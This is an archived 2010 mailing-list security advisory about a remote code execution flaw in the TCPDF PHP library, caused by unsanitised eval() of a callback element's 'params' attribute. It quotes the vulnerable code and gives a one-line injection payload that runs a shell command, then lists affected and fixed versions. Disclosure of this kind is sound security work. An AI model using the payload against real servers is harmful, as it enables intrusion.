lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <4BBD654A.7000505@sixserv.org>
Date: Thu, 08 Apr 2010 07:10:34 +0200
From: Matthias -apoc- Hecker <apoc@...serv.org>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: TCPDF Library Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --[ Product

TCPDF is an Open Source PHP class for generating PDF documents.
TCPDF project was started in 2002 and now it is freely used all
over the world by millions of people. TCPDF is a Free Libre Open
Source Software (FLOSS). -- http://www.tcpdf.org/

- --[ Vulnerability

Under certain circumstances, an intruder may be able to take
advantage of this flaw to execute arbitrary code with the
privileges of the web server.

To exploit this issue the application that is using TCPDF must be
vulnerable to cross-site scripting inside their pdf generating
code.

The problem is caused by the TCPDF callback element that could be
injected into HTML code. The parsing of the callback element is
using the 'params' attribute inside an eval() statement without any
sanitation.

- --[ Affected Code

tcpdf.php:15421:
case 'tcpdf': {
  // NOT HTML: used to call TCPDF methods
  if (isset($tag['attribute']['method'])) {
    $tcpdf_method = $tag['attribute']['method'];
    if (method_exists($this, $tcpdf_method)) {
      if (isset($tag['attribute']['params']) AND
         (!empty($tag['attribute']['params']))) {

        eval('$params = array('.$this->unhtmlentities(
          $tag['attribute']['params']).');');

        call_user_func_array(array($this, $tcpdf_method),
          $params);
      } else {
        $this->$tcpdf_method();
      }
      $this->newline = true;
    }
  }
}

- --[ Proof of Concept

The injection of the following TCPDF callback element into HTML
code (that is processed by TCPDF) will exploit the issue:

<tcpdf method="Rect" params=");echo `id`;die(" />

- --[ Affected Versions

TCPDF versions from 4.5.036 (2009-04-03) to 4.9.005 (2010-04-01)
are vulnerable to this issue, version 4.9.006 (2010-04-02) fixes
the problem.

The new version introduced a configuration constant to disable the
TCPDF callback element: K_TCPDF_CALLS_IN_HTML (default: true)

- --[ Timeline

2010-04-02 -- Vendor notified
2010-04-02 -- Vendor reaction and security fix
2010-04-08 -- Public disclosure (with vendor permissions)

- --
(a) (p)roof (o)f (c)oncept ..
  http://apoc.sixserv.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAku9ZUoACgkQWlhozqFVuMtAFACfSRQzl9Z6b9tMerJRbQ0qXyW4
aD8An0o+79nWFtxA29x4XbUARZkg2rr7
=9coC
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ